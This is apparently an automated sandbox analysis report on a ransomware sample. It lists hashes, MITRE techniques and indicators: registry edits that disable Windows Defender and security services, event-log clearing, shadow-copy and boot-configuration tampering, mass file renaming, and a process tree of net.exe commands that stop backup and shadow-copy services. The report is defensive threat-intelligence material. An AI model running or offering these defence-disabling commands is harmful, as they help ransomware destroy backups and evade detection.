af9e8f301a3677b457345921d7ee765a842eceb7df107714eaffc6193bfc6bbe

Analysis

max time kernel
19s
max time network
21s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
14-01-2025 20:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

211xahcou.exe
Size

3.9MB
MD5

0e4d44dde522c07d09d9e3086cfae803
SHA1

d8dc26e2094869a0da78ecb47494c931419302dc
SHA256

33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277
SHA512

ac1f269b028217210a72fc5c2e0cb07461e2ff896f8b5ba65771787f99ec34b0f9951cf73d9d387086f79c348c343d147aebc2fd5b7e18da009bc2041e2eee06
SSDEEP

49152:e2NiZPNNirb/T2vO90dL3BmAFd4A64nsfJk0NuXCdmTQb0/6VCrrPrsbg11VgWA2:e2ANB04yIa0hsirubO

Score

10^/10

defense_evasion evasion execution impact ransomware spyware stealer trojan

Malware Config

Signatures

Disables service(s) 3 TTPs
evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002

Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe

Modifies security service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe

Clears Windows event logs 1 TTPs 3 IoCs

evasion ransomware

Clear Windows Event Logs

T1070.001

pid	Process
1572	wevtutil.exe
4892	wevtutil.exe
1132	wevtutil.exe

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
968	bcdedit.exe
2620	bcdedit.exe

Renames multiple (313) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware
Renames multiple (51) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware
Renames multiple (56) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware
Renames multiple (62) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware
Renames multiple (70) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4456	powershell.exe
4152	powershell.exe

Modifies Security services 2 TTPs 6 IoCs

Modifies the startup behavior of a security service.

defense_evasion

Modify Registry

T1112

Impair Defenses

T1562

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SecurityHealthService\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SecurityHealthService\Start = "4"	reg.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Java\jre-1.8\lib\javafx.properties.uVG34-4qVR4vEkg8ZELntY55r38QMPHOCUL0skbkoIj_DgAAAA4AAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioStd2019R_OEM_Perp-ul-phn.xrm-ms.uVG34-4qVR4vEkg8ZELntY55r38QMPHOCUL0skbkoIj_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\7-Zip\Lang\tg.txt.uVG34-4qVR4vEkg8ZELntY55r38QMPHOCUL0skbkoIj_NgAAADYAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\lib\security\trusted.libraries.uVG34-4qVR4vEkg8ZELntY55r38QMPHOCUL0skbkoIj_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\COMPASS\PREVIEW.GIF.uVG34-4qVR4vEkg8ZELntY55r38QMPHOCUL0skbkoIj_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\PowerPointR_Retail-pl.xrm-ms.uVG34-4qVR4vEkg8ZELntY55r38QMPHOCUL0skbkoIj_GAAAABgAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Standard2019R_Retail-ul-phn.xrm-ms.uVG34-4qVR4vEkg8ZELntY55r38QMPHOCUL0skbkoIj_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.contrast-black_scale-180.png.uVG34-4qVR4vEkg8ZELntY55r38QMPHOCUL0skbkoIj_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Templates\1033\ApothecaryResume.dotx.uVG34-4qVR4vEkg8ZELntY55r38QMPHOCUL0skbkoIj_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Internet Explorer\uk-UA\iexplore.exe.mui	211xahcou.exe
File opened for modification	C:\Program Files\Java\jre-1.8\lib\images\cursors\win32_MoveDrop32x32.gif.uVG34-4qVR4vEkg8ZELntY55r38QMPHOCUL0skbkoIj_KAAAACgAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Access2019R_Trial-ul-oob.xrm-ms.uVG34-4qVR4vEkg8ZELntY55r38QMPHOCUL0skbkoIj_GgAAABoAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusE5R_Subscription-ppd.xrm-ms.uVG34-4qVR4vEkg8ZELntY55r38QMPHOCUL0skbkoIj_CgAAAAoAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\Fonts\private\BRADHITC.TTF.uVG34-4qVR4vEkg8ZELntY55r38QMPHOCUL0skbkoIj_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vreg\wordmui.msi.16.en-us.vreg.dat.uVG34-4qVR4vEkg8ZELntY55r38QMPHOCUL0skbkoIj_JAAAACQAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlusVL_MAK-ul-phn.xrm-ms.uVG34-4qVR4vEkg8ZELntY55r38QMPHOCUL0skbkoIj_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectProXC2RVL_MAKC2R-ul-oob.xrm-ms.uVG34-4qVR4vEkg8ZELntY55r38QMPHOCUL0skbkoIj_BgAAAAYAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\EXCEL.VisualElementsManifest.xml.uVG34-4qVR4vEkg8ZELntY55r38QMPHOCUL0skbkoIj_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Common Files\System\ado\msado28.tlb	211xahcou.exe
File opened for modification	C:\Program Files\Common Files\System\msadc\it-IT\msaddsr.dll.mui.uVG34-4qVR4vEkg8ZELntY55r38QMPHOCUL0skbkoIj_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Java\jre-1.8\lib\psfontj2d.properties.uVG34-4qVR4vEkg8ZELntY55r38QMPHOCUL0skbkoIj_EgAAABIAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\CAPSULES\THMBNAIL.PNG.uVG34-4qVR4vEkg8ZELntY55r38QMPHOCUL0skbkoIj_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\legal\javafx\mesa3d.md.uVG34-4qVR4vEkg8ZELntY55r38QMPHOCUL0skbkoIj_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Java\jre-1.8\lib\rt.jar.uVG34-4qVR4vEkg8ZELntY55r38QMPHOCUL0skbkoIj_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Standard2019VL_KMS_Client_AE-ul-oob.xrm-ms.uVG34-4qVR4vEkg8ZELntY55r38QMPHOCUL0skbkoIj_HgAAAB4AAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL090.XML.uVG34-4qVR4vEkg8ZELntY55r38QMPHOCUL0skbkoIj_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Common Files\System\it-IT\wab32res.dll.mui	211xahcou.exe
File opened for modification	C:\Program Files\Java\jre-1.8\lib\deploy\messages_de.properties.uVG34-4qVR4vEkg8ZELntY55r38QMPHOCUL0skbkoIj_IAAAACAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Subscription2-pl.xrm-ms.uVG34-4qVR4vEkg8ZELntY55r38QMPHOCUL0skbkoIj_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusinessVL_MAK-pl.xrm-ms.uVG34-4qVR4vEkg8ZELntY55r38QMPHOCUL0skbkoIj_KAAAACgAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\OutlookR_Retail-ul-oob.xrm-ms.uVG34-4qVR4vEkg8ZELntY55r38QMPHOCUL0skbkoIj_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\PowerPointR_Trial-pl.xrm-ms.uVG34-4qVR4vEkg8ZELntY55r38QMPHOCUL0skbkoIj_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_OEM_Perp4-ul-oob.xrm-ms.uVG34-4qVR4vEkg8ZELntY55r38QMPHOCUL0skbkoIj_CgAAAAoAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusinessEntry2019R_PrepidBypass-ppd.xrm-ms.uVG34-4qVR4vEkg8ZELntY55r38QMPHOCUL0skbkoIj_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioProR_Grace-ppd.xrm-ms.uVG34-4qVR4vEkg8ZELntY55r38QMPHOCUL0skbkoIj_LgAAAC4AAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Integration\C2RManifest.Proof.Culture.msi.16.fr-fr.xml.uVG34-4qVR4vEkg8ZELntY55r38QMPHOCUL0skbkoIj_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_SubTrial4-pl.xrm-ms.uVG34-4qVR4vEkg8ZELntY55r38QMPHOCUL0skbkoIj_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\tracedefinition130.xml.uVG34-4qVR4vEkg8ZELntY55r38QMPHOCUL0skbkoIj_AgAAAAIAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Common Files\System\msadc\ja-JP\msadcor.dll.mui.uVG34-4qVR4vEkg8ZELntY55r38QMPHOCUL0skbkoIj_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\Interceptor.tlb.uVG34-4qVR4vEkg8ZELntY55r38QMPHOCUL0skbkoIj_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Excel2019R_OEM_Perp-ppd.xrm-ms.uVG34-4qVR4vEkg8ZELntY55r38QMPHOCUL0skbkoIj_HgAAAB4AAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SUMIPNTG\SUMIPNTG.INF.uVG34-4qVR4vEkg8ZELntY55r38QMPHOCUL0skbkoIj_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Outlook2019VL_MAK_AE-ul-phn.xrm-ms.uVG34-4qVR4vEkg8ZELntY55r38QMPHOCUL0skbkoIj_JAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\PowerPoint2019R_Grace-ul-oob.xrm-ms.uVG34-4qVR4vEkg8ZELntY55r38QMPHOCUL0skbkoIj_BgAAAAYAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\RICEPAPR\RICEPAPR.ELM.uVG34-4qVR4vEkg8ZELntY55r38QMPHOCUL0skbkoIj_MAAAADAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdCO365R_Subscription-ul-oob.xrm-ms.uVG34-4qVR4vEkg8ZELntY55r38QMPHOCUL0skbkoIj_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\7-Zip\7zCon.sfx.uVG34-4qVR4vEkg8ZELntY55r38QMPHOCUL0skbkoIj_PAAAADwAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeStudent2019R_OEM_Perp-ul-phn.xrm-ms.uVG34-4qVR4vEkg8ZELntY55r38QMPHOCUL0skbkoIj_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\pkeyconfig-office.xrm-ms.uVG34-4qVR4vEkg8ZELntY55r38QMPHOCUL0skbkoIj_NgAAADYAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\Cartridges\sql2000.xsl.uVG34-4qVR4vEkg8ZELntY55r38QMPHOCUL0skbkoIj_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Microsoft Office\root\rsod\osmuxmui.msi.16.en-us.boot.tree.dat.uVG34-4qVR4vEkg8ZELntY55r38QMPHOCUL0skbkoIj_KgAAACoAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\pictureinpicture@mozilla.org.xpi.uVG34-4qVR4vEkg8ZELntY55r38QMPHOCUL0skbkoIj_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdR_Grace-ppd.xrm-ms.uVG34-4qVR4vEkg8ZELntY55r38QMPHOCUL0skbkoIj_OgAAADoAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Common Files\System\msadc\it-IT\msdaprsr.dll.mui.uVG34-4qVR4vEkg8ZELntY55r38QMPHOCUL0skbkoIj_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Common Files\System\msadc\it-IT\msdaremr.dll.mui.uVG34-4qVR4vEkg8ZELntY55r38QMPHOCUL0skbkoIj_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\legal\javafx\glib.md.uVG34-4qVR4vEkg8ZELntY55r38QMPHOCUL0skbkoIj_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogo.contrast-black_scale-180.png.uVG34-4qVR4vEkg8ZELntY55r38QMPHOCUL0skbkoIj_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\Checkmark.White@2x.png.uVG34-4qVR4vEkg8ZELntY55r38QMPHOCUL0skbkoIj_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentDemoR_BypassTrial180-ppd.xrm-ms.uVG34-4qVR4vEkg8ZELntY55r38QMPHOCUL0skbkoIj_GgAAABoAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Publisher2019R_Trial-ppd.xrm-ms.uVG34-4qVR4vEkg8ZELntY55r38QMPHOCUL0skbkoIj_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019R_PrepidBypass-ppd.xrm-ms.uVG34-4qVR4vEkg8ZELntY55r38QMPHOCUL0skbkoIj_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioProVL_KMS_Client-ul-oob.xrm-ms.uVG34-4qVR4vEkg8ZELntY55r38QMPHOCUL0skbkoIj_DAAAAAwAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_OEM_Perp6-ppd.xrm-ms.uVG34-4qVR4vEkg8ZELntY55r38QMPHOCUL0skbkoIj_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdCO365R_SubTrial-pl.xrm-ms.uVG34-4qVR4vEkg8ZELntY55r38QMPHOCUL0skbkoIj_AAAAAAAAAAA0.cv2gj	211xahcou.exe

Launches sc.exe 8 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3100	sc.exe
4368	sc.exe
3452	sc.exe
3252	sc.exe
2836	sc.exe
1296	sc.exe
552	sc.exe
4216	sc.exe

Interacts with shadow copies 3 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
1464	vssadmin.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
4456	powershell.exe
4456	powershell.exe
4152	powershell.exe
4152	powershell.exe
4272	211xahcou.exe
4272	211xahcou.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeSecurityPrivilege	1572	wevtutil.exe
Token: SeBackupPrivilege	1572	wevtutil.exe
Token: SeSecurityPrivilege	4892	wevtutil.exe
Token: SeBackupPrivilege	4892	wevtutil.exe
Token: SeSecurityPrivilege	1132	wevtutil.exe
Token: SeBackupPrivilege	1132	wevtutil.exe
Token: SeIncreaseQuotaPrivilege	4388	wmic.exe
Token: SeSecurityPrivilege	4388	wmic.exe
Token: SeTakeOwnershipPrivilege	4388	wmic.exe
Token: SeLoadDriverPrivilege	4388	wmic.exe
Token: SeSystemProfilePrivilege	4388	wmic.exe
Token: SeSystemtimePrivilege	4388	wmic.exe
Token: SeProfSingleProcessPrivilege	4388	wmic.exe
Token: SeIncBasePriorityPrivilege	4388	wmic.exe
Token: SeCreatePagefilePrivilege	4388	wmic.exe
Token: SeBackupPrivilege	4388	wmic.exe
Token: SeRestorePrivilege	4388	wmic.exe
Token: SeShutdownPrivilege	4388	wmic.exe
Token: SeDebugPrivilege	4388	wmic.exe
Token: SeSystemEnvironmentPrivilege	4388	wmic.exe
Token: SeRemoteShutdownPrivilege	4388	wmic.exe
Token: SeUndockPrivilege	4388	wmic.exe
Token: SeManageVolumePrivilege	4388	wmic.exe
Token: 33	4388	wmic.exe
Token: 34	4388	wmic.exe
Token: 35	4388	wmic.exe
Token: 36	4388	wmic.exe
Token: SeIncreaseQuotaPrivilege	3620	wmic.exe
Token: SeSecurityPrivilege	3620	wmic.exe
Token: SeTakeOwnershipPrivilege	3620	wmic.exe
Token: SeLoadDriverPrivilege	3620	wmic.exe
Token: SeSystemProfilePrivilege	3620	wmic.exe
Token: SeSystemtimePrivilege	3620	wmic.exe
Token: SeProfSingleProcessPrivilege	3620	wmic.exe
Token: SeIncBasePriorityPrivilege	3620	wmic.exe
Token: SeCreatePagefilePrivilege	3620	wmic.exe
Token: SeBackupPrivilege	3620	wmic.exe
Token: SeRestorePrivilege	3620	wmic.exe
Token: SeShutdownPrivilege	3620	wmic.exe
Token: SeDebugPrivilege	3620	wmic.exe
Token: SeSystemEnvironmentPrivilege	3620	wmic.exe
Token: SeRemoteShutdownPrivilege	3620	wmic.exe
Token: SeUndockPrivilege	3620	wmic.exe
Token: SeManageVolumePrivilege	3620	wmic.exe
Token: 33	3620	wmic.exe
Token: 34	3620	wmic.exe
Token: 35	3620	wmic.exe
Token: 36	3620	wmic.exe
Token: SeIncreaseQuotaPrivilege	3620	wmic.exe
Token: SeSecurityPrivilege	3620	wmic.exe
Token: SeTakeOwnershipPrivilege	3620	wmic.exe
Token: SeLoadDriverPrivilege	3620	wmic.exe
Token: SeSystemProfilePrivilege	3620	wmic.exe
Token: SeSystemtimePrivilege	3620	wmic.exe
Token: SeProfSingleProcessPrivilege	3620	wmic.exe
Token: SeIncBasePriorityPrivilege	3620	wmic.exe
Token: SeCreatePagefilePrivilege	3620	wmic.exe
Token: SeBackupPrivilege	3620	wmic.exe
Token: SeRestorePrivilege	3620	wmic.exe
Token: SeShutdownPrivilege	3620	wmic.exe
Token: SeDebugPrivilege	3620	wmic.exe
Token: SeSystemEnvironmentPrivilege	3620	wmic.exe
Token: SeRemoteShutdownPrivilege	3620	wmic.exe
Token: SeUndockPrivilege	3620	wmic.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4272 wrote to memory of 3568	4272	211xahcou.exe	86
PID 4272 wrote to memory of 3568	4272	211xahcou.exe	86
PID 3568 wrote to memory of 1728	3568	net.exe	88
PID 3568 wrote to memory of 1728	3568	net.exe	88
PID 4272 wrote to memory of 4912	4272	211xahcou.exe	89
PID 4272 wrote to memory of 4912	4272	211xahcou.exe	89
PID 4912 wrote to memory of 4764	4912	net.exe	91
PID 4912 wrote to memory of 4764	4912	net.exe	91
PID 4272 wrote to memory of 5108	4272	211xahcou.exe	92
PID 4272 wrote to memory of 5108	4272	211xahcou.exe	92
PID 5108 wrote to memory of 2940	5108	net.exe	94
PID 5108 wrote to memory of 2940	5108	net.exe	94
PID 4272 wrote to memory of 4864	4272	211xahcou.exe	95
PID 4272 wrote to memory of 4864	4272	211xahcou.exe	95
PID 4864 wrote to memory of 4372	4864	net.exe	97
PID 4864 wrote to memory of 4372	4864	net.exe	97
PID 4272 wrote to memory of 3868	4272	211xahcou.exe	98
PID 4272 wrote to memory of 3868	4272	211xahcou.exe	98
PID 3868 wrote to memory of 3432	3868	net.exe	100
PID 3868 wrote to memory of 3432	3868	net.exe	100
PID 4272 wrote to memory of 3228	4272	211xahcou.exe	101
PID 4272 wrote to memory of 3228	4272	211xahcou.exe	101
PID 3228 wrote to memory of 4416	3228	net.exe	103
PID 3228 wrote to memory of 4416	3228	net.exe	103
PID 4272 wrote to memory of 4304	4272	211xahcou.exe	104
PID 4272 wrote to memory of 4304	4272	211xahcou.exe	104
PID 4304 wrote to memory of 2768	4304	net.exe	106
PID 4304 wrote to memory of 2768	4304	net.exe	106
PID 4272 wrote to memory of 4984	4272	211xahcou.exe	107
PID 4272 wrote to memory of 4984	4272	211xahcou.exe	107
PID 4984 wrote to memory of 1900	4984	net.exe	109
PID 4984 wrote to memory of 1900	4984	net.exe	109
PID 4272 wrote to memory of 552	4272	211xahcou.exe	110
PID 4272 wrote to memory of 552	4272	211xahcou.exe	110
PID 4272 wrote to memory of 4216	4272	211xahcou.exe	112
PID 4272 wrote to memory of 4216	4272	211xahcou.exe	112
PID 4272 wrote to memory of 3100	4272	211xahcou.exe	114
PID 4272 wrote to memory of 3100	4272	211xahcou.exe	114
PID 4272 wrote to memory of 4368	4272	211xahcou.exe	116
PID 4272 wrote to memory of 4368	4272	211xahcou.exe	116
PID 4272 wrote to memory of 3452	4272	211xahcou.exe	118
PID 4272 wrote to memory of 3452	4272	211xahcou.exe	118
PID 4272 wrote to memory of 3252	4272	211xahcou.exe	120
PID 4272 wrote to memory of 3252	4272	211xahcou.exe	120
PID 4272 wrote to memory of 2836	4272	211xahcou.exe	122
PID 4272 wrote to memory of 2836	4272	211xahcou.exe	122
PID 4272 wrote to memory of 1296	4272	211xahcou.exe	124
PID 4272 wrote to memory of 1296	4272	211xahcou.exe	124
PID 4272 wrote to memory of 4592	4272	211xahcou.exe	126
PID 4272 wrote to memory of 4592	4272	211xahcou.exe	126
PID 4272 wrote to memory of 3048	4272	211xahcou.exe	128
PID 4272 wrote to memory of 3048	4272	211xahcou.exe	128
PID 4272 wrote to memory of 4140	4272	211xahcou.exe	130
PID 4272 wrote to memory of 4140	4272	211xahcou.exe	130
PID 4272 wrote to memory of 3904	4272	211xahcou.exe	132
PID 4272 wrote to memory of 3904	4272	211xahcou.exe	132
PID 4272 wrote to memory of 4364	4272	211xahcou.exe	134
PID 4272 wrote to memory of 4364	4272	211xahcou.exe	134
PID 4272 wrote to memory of 548	4272	211xahcou.exe	136
PID 4272 wrote to memory of 548	4272	211xahcou.exe	136
PID 4272 wrote to memory of 2372	4272	211xahcou.exe	138
PID 4272 wrote to memory of 2372	4272	211xahcou.exe	138
PID 4272 wrote to memory of 2720	4272	211xahcou.exe	140
PID 4272 wrote to memory of 2720	4272	211xahcou.exe	140

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\211xahcou.exe
"C:\Users\Admin\AppData\Local\Temp\211xahcou.exe"
1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4272
- C:\Windows\SYSTEM32\net.exe
  net.exe stop "SamSs" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3568
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SamSs" /y
    3⤵
    PID:1728
- C:\Windows\SYSTEM32\net.exe
  net.exe stop "SDRSVC" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4912
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SDRSVC" /y
    3⤵
    PID:4764
- C:\Windows\SYSTEM32\net.exe
  net.exe stop "SstpSvc" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5108
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SstpSvc" /y
    3⤵
    PID:2940
- C:\Windows\SYSTEM32\net.exe
  net.exe stop "vmicvss" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4864
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "vmicvss" /y
    3⤵
    PID:4372
- C:\Windows\SYSTEM32\net.exe
  net.exe stop "VSS" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3868
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "VSS" /y
    3⤵
    PID:3432
- C:\Windows\SYSTEM32\net.exe
  net.exe stop "wbengine" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3228
- - C:\Windows\system32\net1.exe
